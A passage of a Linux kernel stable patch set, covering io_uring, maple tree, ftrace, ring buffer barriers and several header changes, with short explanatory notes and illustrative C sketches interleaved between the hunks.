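	DECLARE_COMPLETION_ONSTACK(done);

	dm_kcopyd_copy(kc, from, 1, to, 0, copy_done, &done);
	wait_for_completion(&done);
}
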
+diff --git a/include/linux/dm-region-hash.h b/include/linux/dm-region-hash.h
+index 9e2a7a401df50..e8691539e1d77 100644
+--- a/include/linux/dm-region-hash.h
++++ b/include/linux/dm-region-hash.h
+@@ -37,7 +37,7 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions);
+ void dm_region_hash_destroy(struct dm_region_hash *rh);
+diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
+index 62557d4bffc2b..8128059db5ed7 100644
+--- a/include/linux/ftrace.h
++++ b/include/linux/ftrace.h
+@@ -943,7 +943,7 @@ static inline void __ftrace_enabled_restore(int enabled)
+ #define CALLER_ADDR5 ((unsigned long)ftrace_return_address(5))
+ #define CALLER_ADDR6 ((unsigned long)ftrace_return_address(6))
+ 
+-static inline unsigned long get_lock_parent_ip(void)
++static __always_inline unsigned long get_lock_parent_ip(void)
+ {
+ 	unsigned long addr = CALLER_ADDR0;
+ 
+diff --git a/include/linux/mm_types.h b/include/linux/mm_types.h
+index 500e536796ca4..247aedb18d5c3 100644
+--- a/include/linux/mm_types.h
++++ b/include/linux/mm_types.h
+@@ -725,7 +725,8 @@ struct mm_struct {
+ 	unsigned long cpu_bitmap[];
+ };
+ 
+-#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN)
++#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN | \
++			 MT_FLAGS_USE_RCU)
+ extern struct mm_struct init_mm;
+ 
+ /* Pointer magic because the dynamic array size confuses some compilers. */
+diff --git a/include/linux/pci-doe.h b/include/linux/pci-doe.h
+index ed9b4df792b88..43765eaf2342c 100644
+--- a/include/linux/pci-doe.h
++++ b/include/linux/pci-doe.h
+@@ -34,6 +34,10 @@ struct pci_doe_mb;
+  * @work: Used internally by the mailbox
+  * @doe_mb: Used internally by the mailbox
+  *
++ * Payloads are treated as opaque byte streams which are transmitted verbatim,
++ * without byte-swapping.  If payloads contain little-endian register values,
++ * the caller is responsible for conversion with cpu_to_le32() / le32_to_cpu().
++ *
+  * The payload sizes and rv are specified in bytes with the following
+  * restrictions concerning the protocol.
+  *
+@@ -45,9 +49,9 @@ struct pci_doe_mb;
+  */
+ struct pci_doe_task {
+ 	struct pci_doe_protocol prot;
+-	u32 *request_pl;
++	__le32 *request_pl;
+ 	size_t request_pl_sz;
+-	u32 *response_pl;
++	__le32 *response_pl;
+ 	size_t response_pl_sz;
+ 	int rv;
+ 	void (*complete)(struct pci_doe_task *task);
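
The new kernel-doc text above moves the byte-order responsibility to the caller; a small sketch of the request side under that rule (helper name is invented):

/* Sketch only: DOE payloads are transmitted verbatim, so a little-endian
 * wire format must be produced explicitly before submitting the task. */
static void fill_doe_request(__le32 *req, const u32 *vals, size_t n)
{
	size_t i;

	for (i = 0; i < n; i++)
		req[i] = cpu_to_le32(vals[i]);
}
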
+diff --git a/include/linux/phylink.h b/include/linux/phylink.h
+index 3f01ac8017e06..6d62c9ea2e040 100644
+--- a/include/linux/phylink.h
++++ b/include/linux/phylink.h
+@@ -566,6 +566,7 @@ struct phylink *phylink_create(struct phylink_config *, struct fwnode_handle *,
+ 			       phy_interface_t iface,
+ 			       const struct phylink_mac_ops *mac_ops);
+ void phylink_destroy(struct phylink *);
++bool phylink_expects_phy(struct phylink *pl);
+ 
+ int phylink_connect_phy(struct phylink *, struct phy_device *);
+ int phylink_of_phy_connect(struct phylink *, struct device_node *, u32 flags);
+diff --git a/include/linux/pwm.h b/include/linux/pwm.h
+index d70c6e5a839d6..4de09163c968a 100644
+--- a/include/linux/pwm.h
++++ b/include/linux/pwm.h
+@@ -276,8 +276,8 @@ struct pwm_ops {
+ 		       struct pwm_capture *result, unsigned long timeout);
+ 	int (*apply)(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		     const struct pwm_state *state);
+-	void (*get_state)(struct pwm_chip *chip, struct pwm_device *pwm,
+-			  struct pwm_state *state);
++	int (*get_state)(struct pwm_chip *chip, struct pwm_device *pwm,
++			 struct pwm_state *state);
+ 	struct module *owner;
+ };
+ 
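
With .get_state() now returning an error code, a driver can propagate a failed register read instead of silently reporting stale state. A hypothetical sketch — foo_pwm, to_foo() and the FOO_* register names are invented:

static int foo_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
			     struct pwm_state *state)
{
	struct foo_pwm *priv = to_foo(chip);	/* hypothetical container_of */
	u32 val;
	int ret;

	ret = regmap_read(priv->regmap, FOO_PWM_CTRL, &val);
	if (ret)
		return ret;	/* previously this failure was unreportable */

	state->enabled = val & FOO_PWM_EN;
	state->polarity = PWM_POLARITY_NORMAL;
	return 0;
}
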
+diff --git a/include/net/raw.h b/include/net/raw.h
+index 5e665934ebc7c..3af5289fdead9 100644
+--- a/include/net/raw.h
++++ b/include/net/raw.h
+@@ -15,6 +15,8 @@
+ 
+ #include <net/inet_sock.h>
+ #include <net/protocol.h>
++#include <net/netns/hash.h>
++#include <linux/hash.h>
+ #include <linux/icmp.h>
+ 
+ extern struct proto raw_prot;
+@@ -29,20 +31,27 @@ int raw_local_deliver(struct sk_buff *, int);
+ 
+ int raw_rcv(struct sock *, struct sk_buff *);
+ 
+-#define RAW_HTABLE_SIZE	MAX_INET_PROTOS
++#define RAW_HTABLE_LOG	8
++#define RAW_HTABLE_SIZE	(1U << RAW_HTABLE_LOG)
+ 
+ struct raw_hashinfo {
+ 	spinlock_t lock;
+-	struct hlist_nulls_head ht[RAW_HTABLE_SIZE];
++
++	struct hlist_head ht[RAW_HTABLE_SIZE] ____cacheline_aligned;
+ };
+ 
++static inline u32 raw_hashfunc(const struct net *net, u32 proto)
++{
++	return hash_32(net_hash_mix(net) ^ proto, RAW_HTABLE_LOG);
++}
++
+ static inline void raw_hashinfo_init(struct raw_hashinfo *hashinfo)
+ {
+ 	int i;
+ 
+ 	spin_lock_init(&hashinfo->lock);
+ 	for (i = 0; i < RAW_HTABLE_SIZE; i++)
+-		INIT_HLIST_NULLS_HEAD(&hashinfo->ht[i], i);
++		INIT_HLIST_HEAD(&hashinfo->ht[i]);
+ }
+ 
+ #ifdef CONFIG_PROC_FS
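
The bucket selection above replaces the old identity mapping (protocol & 255, visible in the net/ipv4/raw.c hunk further down) with a salted multiplicative hash. A standalone sketch, with net_hash_mix() stubbed as a fixed salt and the kernel's GOLDEN_RATIO_32 constant inlined:

#include <stdint.h>
#include <stdio.h>

#define GOLDEN_RATIO_32	0x61C88647u	/* as in include/linux/hash.h */
#define RAW_HTABLE_LOG	8

/* hash_32(): multiply, keep the top "bits" bits */
static uint32_t hash_32(uint32_t val, unsigned int bits)
{
	return (val * GOLDEN_RATIO_32) >> (32 - bits);
}

int main(void)
{
	uint32_t salt = 0xdeadbeef;	/* stand-in for net_hash_mix(net) */
	uint32_t proto;

	for (proto = 0; proto < 4; proto++)
		printf("proto %u -> bucket %u\n", (unsigned int)proto,
		       (unsigned int)hash_32(salt ^ proto, RAW_HTABLE_LOG));
	return 0;
}
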
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index ce4969d3e20de..cc35aba1e4957 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2585,8 +2585,8 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
+ 	io_eventfd_unregister(ctx);
+ 	io_alloc_cache_free(&ctx->apoll_cache, io_apoll_cache_free);
+ 	io_alloc_cache_free(&ctx->netmsg_cache, io_netmsg_cache_free);
+-	mutex_unlock(&ctx->uring_lock);
+ 	io_destroy_buffers(ctx);
++	mutex_unlock(&ctx->uring_lock);
+ 	if (ctx->sq_creds)
+ 		put_cred(ctx->sq_creds);
+ 	if (ctx->submitter_task)
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 746b137b96e9b..acc37e5a6d4e1 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -228,17 +228,18 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
+ 		return i;
+ 	}
+ 
+-	/* the head kbuf is the list itself */
++	/* protects io_buffers_cache */
++	lockdep_assert_held(&ctx->uring_lock);
++
+ 	while (!list_empty(&bl->buf_list)) {
+ 		struct io_buffer *nxt;
+ 
+ 		nxt = list_first_entry(&bl->buf_list, struct io_buffer, list);
+-		list_del(&nxt->list);
++		list_move(&nxt->list, &ctx->io_buffers_cache);
+ 		if (++i == nbufs)
+ 			return i;
+ 		cond_resched();
+ 	}
+-	i++;
+ 
+ 	return i;
+ }
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 2aa286b4151b3..7699b99706ad4 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -12040,7 +12040,7 @@ perf_event_set_output(struct perf_event *event, struct perf_event *output_event)
+ 	/*
+ 	 * If its not a per-cpu rb, it must be the same task.
+ 	 */
+-	if (output_event->cpu == -1 && output_event->ctx != event->ctx)
++	if (output_event->cpu == -1 && output_event->hw.target != event->hw.target)
+ 		goto out;
+ 
+ 	/*
+diff --git a/kernel/fork.c b/kernel/fork.c
+index a6d243a50be3e..ec913b13c5edb 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -617,6 +617,7 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	if (retval)
+ 		goto out;
+ 
++	mt_clear_in_rcu(mas.tree);
+ 	mas_for_each(&old_mas, mpnt, ULONG_MAX) {
+ 		struct file *file;
+ 
+@@ -703,6 +704,8 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	retval = arch_dup_mmap(oldmm, mm);
+ loop_out:
+ 	mas_destroy(&mas);
++	if (!retval)
++		mt_set_in_rcu(mas.tree);
+ out:
+ 	mmap_write_unlock(mm);
+ 	flush_tlb_mm(oldmm);
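
The bracketing added above drops the tree out of RCU mode for the single-threaded copy and re-enables it only on success; the same pattern in isolation (populate_tree() is a hypothetical bulk-rewrite step):

/* Sketch only: while RCU mode is off, freed nodes may be reused
 * immediately, so no concurrent readers may walk the tree. */
static int rebuild_locked(struct maple_tree *mt)
{
	int err;

	mt_clear_in_rcu(mt);		/* exclusive rewrite begins */
	err = populate_tree(mt);	/* hypothetical */
	if (!err)
		mt_set_in_rcu(mt);	/* publish: lockless readers OK again */
	return err;
}
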
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 59062fedeaf7c..57db50c2dce80 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -5557,12 +5557,15 @@ int modify_ftrace_direct(unsigned long ip,
+ 		ret = 0;
+ 	}
+ 
+-	if (unlikely(ret && new_direct)) {
+-		direct->count++;
+-		list_del_rcu(&new_direct->next);
+-		synchronize_rcu_tasks();
+-		kfree(new_direct);
+-		ftrace_direct_func_count--;
++	if (ret) {
++		direct->addr = old_addr;
++		if (unlikely(new_direct)) {
++			direct->count++;
++			list_del_rcu(&new_direct->next);
++			synchronize_rcu_tasks();
++			kfree(new_direct);
++			ftrace_direct_func_count--;
++		}
+ 	}
+ 
+  out_unlock:
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 361bd8beafdff..9d8538531a545 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -3084,6 +3084,10 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 		if (RB_WARN_ON(cpu_buffer,
+ 			       rb_is_reader_page(cpu_buffer->tail_page)))
+ 			return;
++		/*
++		 * No need for a memory barrier here, as the update
++		 * of the tail_page did it for this page.
++		 */
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		rb_inc_page(&cpu_buffer->commit_page);
+@@ -3093,6 +3097,8 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 	while (rb_commit_index(cpu_buffer) !=
+ 	       rb_page_write(cpu_buffer->commit_page)) {
+ 
++		/* Make sure the readers see the content of what is committed. */
++		smp_wmb();
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		RB_WARN_ON(cpu_buffer,
+@@ -4672,7 +4678,12 @@ rb_get_reader_page(struct ring_buffer_per_cpu *cpu_buffer)
+ 
+ 	/*
+ 	 * Make sure we see any padding after the write update
+-	 * (see rb_reset_tail())
++	 * (see rb_reset_tail()).
++	 *
++	 * In addition, a writer may be writing on the reader page
++	 * if the page has not been fully filled, so the read barrier
++	 * is also needed to make sure we see the content of what is
++	 * committed by the writer (see rb_set_commit_to_write()).
+ 	 */
+ 	smp_rmb();
+ 
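
The smp_wmb()/smp_rmb() pair added above follows the usual publish/consume discipline: the writer makes the page contents visible before publishing the commit, the reader observes the commit before reading the contents. A self-contained C11 analogue, with fences standing in for the kernel barriers:

#include <assert.h>
#include <pthread.h>
#include <stdatomic.h>

static int payload;			/* the "page contents" */
static atomic_int committed;		/* the "commit index" */

static void *writer(void *arg)
{
	payload = 42;					/* write the data */
	atomic_thread_fence(memory_order_release);	/* ~ smp_wmb() */
	atomic_store_explicit(&committed, 1, memory_order_relaxed);
	return arg;
}

static void *reader(void *arg)
{
	while (!atomic_load_explicit(&committed, memory_order_relaxed))
		;					/* wait for commit */
	atomic_thread_fence(memory_order_acquire);	/* ~ smp_rmb() */
	assert(payload == 42);		/* ordering guarantees visibility */
	return arg;
}

int main(void)
{
	pthread_t w, r;

	pthread_create(&w, NULL, writer, NULL);
	pthread_create(&r, NULL, reader, NULL);
	pthread_join(w, NULL);
	pthread_join(r, NULL);
	return 0;
}
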
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 78d69b9488e45..78855e74e355f 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9470,6 +9470,7 @@ static int __remove_instance(struct trace_array *tr)
+ 	tracefs_remove(tr->dir);
+ 	free_percpu(tr->last_func_repeats);
+ 	free_trace_buffers(tr);
++	clear_tracing_err_log(tr);
+ 
+ 	for (i = 0; i < tr->nr_topts; i++) {
+ 		kfree(tr->topts[i].topts);
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index 67592eed0be8d..89083ae1aebe3 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -44,14 +44,21 @@ enum { ERRORS };
+ 
+ static const char *err_text[] = { ERRORS };
+ 
++static DEFINE_MUTEX(lastcmd_mutex);
+ static char *last_cmd;
+ 
+ static int errpos(const char *str)
+ {
++	int ret = 0;
++
++	mutex_lock(&lastcmd_mutex);
+ 	if (!str || !last_cmd)
+-		return 0;
++		goto out;
+ 
+-	return err_pos(last_cmd, str);
++	ret = err_pos(last_cmd, str);
++ out:
++	mutex_unlock(&lastcmd_mutex);
++	return ret;
+ }
+ 
+ static void last_cmd_set(const char *str)
+@@ -59,18 +66,22 @@ static void last_cmd_set(const char *str)
+ 	if (!str)
+ 		return;
+ 
++	mutex_lock(&lastcmd_mutex);
+ 	kfree(last_cmd);
+-
+ 	last_cmd = kstrdup(str, GFP_KERNEL);
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static void synth_err(u8 err_type, u16 err_pos)
+ {
++	mutex_lock(&lastcmd_mutex);
+ 	if (!last_cmd)
+-		return;
++		goto out;
+ 
+ 	tracing_log_err(NULL, "synthetic_events", last_cmd, err_text,
+ 			err_type, err_pos);
++ out:
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static int create_synth_event(const char *raw_command);
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 1c07efcb3d466..689361097bb0c 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -1270,7 +1270,7 @@ static void notify_new_max_latency(u64 latency)
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(inst, &osnoise_instances, list) {
+ 		tr = inst->tr;
+-		if (tr->max_latency < latency) {
++		if (tracer_tracing_is_on(tr) && tr->max_latency < latency) {
+ 			tr->max_latency = latency;
+ 			latency_fsnotify(tr);
+ 		}
+@@ -1681,6 +1681,8 @@ static int timerlat_main(void *data)
+ 
+ 		trace_timerlat_sample(&s);
+ 
++		notify_new_max_latency(diff);
++
+ 		timerlat_dump_stack(time_to_us(diff));
+ 
+ 		tlat->tracing_thread = false;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 96be96a1f35dc..84530fb73bd9e 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -149,13 +149,12 @@ struct maple_subtree_state {
+ /* Functions */
+ static inline struct maple_node *mt_alloc_one(gfp_t gfp)
+ {
+-	return kmem_cache_alloc(maple_node_cache, gfp | __GFP_ZERO);
++	return kmem_cache_alloc(maple_node_cache, gfp);
+ }
+ 
+ static inline int mt_alloc_bulk(gfp_t gfp, size_t size, void **nodes)
+ {
+-	return kmem_cache_alloc_bulk(maple_node_cache, gfp | __GFP_ZERO, size,
+-				     nodes);
++	return kmem_cache_alloc_bulk(maple_node_cache, gfp, size, nodes);
+ }
+ 
+ static inline void mt_free_bulk(size_t size, void __rcu **nodes)
+@@ -530,11 +529,14 @@ static inline struct maple_node *mte_parent(const struct maple_enode *enode)
+  */
+ static inline bool ma_dead_node(const struct maple_node *node)
+ {
+-	struct maple_node *parent = (void *)((unsigned long)
+-					     node->parent & ~MAPLE_NODE_MASK);
++	struct maple_node *parent;
+ 
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
++	parent = (void *)((unsigned long) node->parent & ~MAPLE_NODE_MASK);
+ 	return (parent == node);
+ }
++
+ /*
+  * mte_dead_node() - check if the @enode is dead.
+  * @enode: The encoded maple node
+@@ -546,6 +548,8 @@ static inline bool mte_dead_node(const struct maple_enode *enode)
+ 	struct maple_node *parent, *node;
+ 
+ 	node = mte_to_node(enode);
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
+ 	parent = mte_parent(enode);
+ 	return (parent == node);
+ }
+@@ -616,6 +620,8 @@ static inline unsigned int mas_alloc_req(const struct ma_state *mas)
+  * @node - the maple node
+  * @type - the node type
+  *
++ * In the event of a dead node, this array may be %NULL
++ *
+  * Return: A pointer to the maple node pivots
+  */
+ static inline unsigned long *ma_pivots(struct maple_node *node,
+@@ -808,6 +814,11 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ 	return rcu_dereference_check(slots[offset], mt_locked(mt));
+ }
+ 
++static inline void *mt_slot_locked(struct maple_tree *mt, void __rcu **slots,
++				   unsigned char offset)
++{
++	return rcu_dereference_protected(slots[offset], mt_locked(mt));
++}
+ /*
+  * mas_slot_locked() - Get the slot value when holding the maple tree lock.
+  * @mas: The maple state
+@@ -819,7 +830,7 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ static inline void *mas_slot_locked(struct ma_state *mas, void __rcu **slots,
+ 				       unsigned char offset)
+ {
+-	return rcu_dereference_protected(slots[offset], mt_locked(mas->tree));
++	return mt_slot_locked(mas->tree, slots, offset);
+ }
+ 
+ /*
+@@ -890,6 +901,45 @@ static inline void ma_set_meta(struct maple_node *mn, enum maple_type mt,
+ 	meta->end = end;
+ }
+ 
++/*
++ * mt_clear_meta() - clear the metadata information of a node, if it exists
++ * @mt: The maple tree
++ * @mn: The maple node
++ * @type: The maple node type
++ * @offset: The offset of the highest sub-gap in this node.
++ * @end: The end of the data in this node.
++ */
++static inline void mt_clear_meta(struct maple_tree *mt, struct maple_node *mn,
++				  enum maple_type type)
++{
++	struct maple_metadata *meta;
++	unsigned long *pivots;
++	void __rcu **slots;
++	void *next;
++
++	switch (type) {
++	case maple_range_64:
++		pivots = mn->mr64.pivot;
++		if (unlikely(pivots[MAPLE_RANGE64_SLOTS - 2])) {
++			slots = mn->mr64.slot;
++			next = mt_slot_locked(mt, slots,
++					      MAPLE_RANGE64_SLOTS - 1);
++			if (unlikely((mte_to_node(next) &&
++				      mte_node_type(next))))
++				return; /* no metadata, could be node */
++		}
++		fallthrough;
++	case maple_arange_64:
++		meta = ma_meta(mn, type);
++		break;
++	default:
++		return;
++	}
++
++	meta->gap = 0;
++	meta->end = 0;
++}
++
+ /*
+  * ma_meta_end() - Get the data end of a node from the metadata
+  * @mn: The maple node
+@@ -1087,8 +1137,11 @@ static int mas_ascend(struct ma_state *mas)
+ 		a_type = mas_parent_enum(mas, p_enode);
+ 		a_node = mte_parent(p_enode);
+ 		a_slot = mte_parent_slot(p_enode);
+-		pivots = ma_pivots(a_node, a_type);
+ 		a_enode = mt_mk_node(a_node, a_type);
++		pivots = ma_pivots(a_node, a_type);
++
++		if (unlikely(ma_dead_node(a_node)))
++			return 1;
+ 
+ 		if (!set_min && a_slot) {
+ 			set_min = true;
+@@ -1123,9 +1176,10 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ {
+ 	struct maple_alloc *ret, *node = mas->alloc;
+ 	unsigned long total = mas_allocated(mas);
++	unsigned int req = mas_alloc_req(mas);
+ 
+ 	/* nothing or a request pending. */
+-	if (unlikely(!total))
++	if (WARN_ON(!total))
+ 		return NULL;
+ 
+ 	if (total == 1) {
+@@ -1135,27 +1189,25 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ 		goto single_node;
+ 	}
+ 
+-	if (!node->node_count) {
++	if (node->node_count == 1) {
+ 		/* Single allocation in this node. */
+ 		mas->alloc = node->slot[0];
+-		node->slot[0] = NULL;
+ 		mas->alloc->total = node->total - 1;
+ 		ret = node;
+ 		goto new_head;
+ 	}
+-
+ 	node->total--;
+-	ret = node->slot[node->node_count];
+-	node->slot[node->node_count--] = NULL;
++	ret = node->slot[--node->node_count];
++	node->slot[node->node_count] = NULL;
+ 
+ single_node:
+ new_head:
+-	ret->total = 0;
+-	ret->node_count = 0;
+-	if (ret->request_count) {
+-		mas_set_alloc_req(mas, ret->request_count + 1);
+-		ret->request_count = 0;
++	if (req) {
++		req++;
++		mas_set_alloc_req(mas, req);
+ 	}
++
++	memset(ret, 0, sizeof(*ret));
+ 	return (struct maple_node *)ret;
+ }
+ 
+@@ -1174,21 +1226,20 @@ static inline void mas_push_node(struct ma_state *mas, struct maple_node *used)
+ 	unsigned long count;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 
+-	memset(reuse, 0, sizeof(*reuse));
+ 	count = mas_allocated(mas);
+ 
+-	if (count && (head->node_count < MAPLE_ALLOC_SLOTS - 1)) {
+-		if (head->slot[0])
+-			head->node_count++;
+-		head->slot[head->node_count] = reuse;
++	reuse->request_count = 0;
++	reuse->node_count = 0;
++	if (count && (head->node_count < MAPLE_ALLOC_SLOTS)) {
++		head->slot[head->node_count++] = reuse;
+ 		head->total++;
+ 		goto done;
+ 	}
+ 
+ 	reuse->total = 1;
+ 	if ((head) && !((unsigned long)head & 0x1)) {
+-		head->request_count = 0;
+ 		reuse->slot[0] = head;
++		reuse->node_count = 1;
+ 		reuse->total += head->total;
+ 	}
+ 
+@@ -1207,7 +1258,6 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ {
+ 	struct maple_alloc *node;
+ 	unsigned long allocated = mas_allocated(mas);
+-	unsigned long success = allocated;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 	unsigned int count;
+ 	void **slots = NULL;
+@@ -1223,24 +1273,29 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 		WARN_ON(!allocated);
+ 	}
+ 
+-	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS - 1) {
++	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS) {
+ 		node = (struct maple_alloc *)mt_alloc_one(gfp);
+ 		if (!node)
+ 			goto nomem_one;
+ 
+-		if (allocated)
++		if (allocated) {
+ 			node->slot[0] = mas->alloc;
++			node->node_count = 1;
++		} else {
++			node->node_count = 0;
++		}
+ 
+-		success++;
+ 		mas->alloc = node;
++		node->total = ++allocated;
+ 		requested--;
+ 	}
+ 
+ 	node = mas->alloc;
++	node->request_count = 0;
+ 	while (requested) {
+ 		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->slot[0]) {
+-			unsigned int offset = node->node_count + 1;
++		if (node->node_count) {
++			unsigned int offset = node->node_count;
+ 
+ 			slots = (void **)&node->slot[offset];
+ 			max_req -= offset;
+@@ -1254,15 +1309,13 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 			goto nomem_bulk;
+ 
+ 		node->node_count += count;
+-		/* zero indexed. */
+-		if (slots == (void **)&node->slot)
+-			node->node_count--;
+-
+-		success += count;
++		allocated += count;
+ 		node = node->slot[0];
++		node->node_count = 0;
++		node->request_count = 0;
+ 		requested -= count;
+ 	}
+-	mas->alloc->total = success;
++	mas->alloc->total = allocated;
+ 	return;
+ 
+ nomem_bulk:
+@@ -1271,7 +1324,7 @@ nomem_bulk:
+ nomem_one:
+ 	mas_set_alloc_req(mas, requested);
+ 	if (mas->alloc && !(((unsigned long)mas->alloc & 0x1)))
+-		mas->alloc->total = success;
++		mas->alloc->total = allocated;
+ 	mas_set_err(mas, -ENOMEM);
+ 	return;
+ 
+@@ -1329,7 +1382,7 @@ static void mas_node_count(struct ma_state *mas, int count)
+  * mas_start() - Sets up maple state for operations.
+  * @mas: The maple state.
+  *
+- * If mas->node == MAS_START, then set the min, max, depth, and offset to
++ * If mas->node == MAS_START, then set the min, max and depth to
+  * defaults.
+  *
+  * Return:
+@@ -1343,22 +1396,26 @@ static inline struct maple_enode *mas_start(struct ma_state *mas)
+ 	if (likely(mas_is_start(mas))) {
+ 		struct maple_enode *root;
+ 
+-		mas->node = MAS_NONE;
+ 		mas->min = 0;
+ 		mas->max = ULONG_MAX;
+ 		mas->depth = 0;
+-		mas->offset = 0;
+ 
++retry:
+ 		root = mas_root(mas);
+ 		/* Tree with nodes */
+ 		if (likely(xa_is_node(root))) {
+ 			mas->depth = 1;
+ 			mas->node = mte_safe_root(root);
++			mas->offset = 0;
++			if (mte_dead_node(mas->node))
++				goto retry;
++
+ 			return NULL;
+ 		}
+ 
+ 		/* empty tree */
+ 		if (unlikely(!root)) {
++			mas->node = MAS_NONE;
+ 			mas->offset = MAPLE_NODE_SLOTS;
+ 			return NULL;
+ 		}
+@@ -1394,6 +1451,9 @@ static inline unsigned char ma_data_end(struct maple_node *node,
+ {
+ 	unsigned char offset;
+ 
++	if (!pivots)
++		return 0;
++
+ 	if (type == maple_arange_64)
+ 		return ma_meta_end(node, type);
+ 
+@@ -1429,6 +1489,9 @@ static inline unsigned char mas_data_end(struct ma_state *mas)
+ 		return ma_meta_end(node, type);
+ 
+ 	pivots = ma_pivots(node, type);
++	if (unlikely(ma_dead_node(node)))
++		return 0;
++
+ 	offset = mt_pivots[type] - 1;
+ 	if (likely(!pivots[offset]))
+ 		return ma_meta_end(node, type);
+@@ -3654,10 +3717,9 @@ static inline int mas_root_expand(struct ma_state *mas, void *entry)
+ 		slot++;
+ 	mas->depth = 1;
+ 	mas_set_height(mas);
+-
++	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	/* swap the new root into the tree */
+ 	rcu_assign_pointer(mas->tree->ma_root, mte_mk_root(mas->node));
+-	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	return slot;
+ }
+ 
+@@ -3870,18 +3932,13 @@ static inline void *mtree_lookup_walk(struct ma_state *mas)
+ 		end = ma_data_end(node, type, pivots, max);
+ 		if (unlikely(ma_dead_node(node)))
+ 			goto dead_node;
+-
+-		if (pivots[offset] >= mas->index)
+-			goto next;
+-
+ 		do {
+-			offset++;
+-		} while ((offset < end) && (pivots[offset] < mas->index));
+-
+-		if (likely(offset > end))
+-			max = pivots[offset];
++			if (pivots[offset] >= mas->index) {
++				max = pivots[offset];
++				break;
++			}
++		} while (++offset < end);
+ 
+-next:
+ 		slots = ma_slots(node, type);
+ 		next = mt_slot(mas->tree, slots, offset);
+ 		if (unlikely(ma_dead_node(node)))
+@@ -4500,6 +4557,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 	node = mas_mn(mas);
+ 	slots = ma_slots(node, mt);
+ 	pivots = ma_pivots(node, mt);
++	if (unlikely(ma_dead_node(node)))
++		return 1;
++
+ 	mas->max = pivots[offset];
+ 	if (offset)
+ 		mas->min = pivots[offset - 1] + 1;
+@@ -4521,6 +4581,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
+ 		offset = ma_data_end(node, mt, pivots, mas->max);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		if (offset)
+ 			mas->min = pivots[offset - 1] + 1;
+ 
+@@ -4569,6 +4632,7 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 	struct maple_enode *enode;
+ 	int level = 0;
+ 	unsigned char offset;
++	unsigned char node_end;
+ 	enum maple_type mt;
+ 	void __rcu **slots;
+ 
+@@ -4592,7 +4656,11 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		node = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+ 		pivots = ma_pivots(node, mt);
+-	} while (unlikely(offset == ma_data_end(node, mt, pivots, mas->max)));
++		node_end = ma_data_end(node, mt, pivots, mas->max);
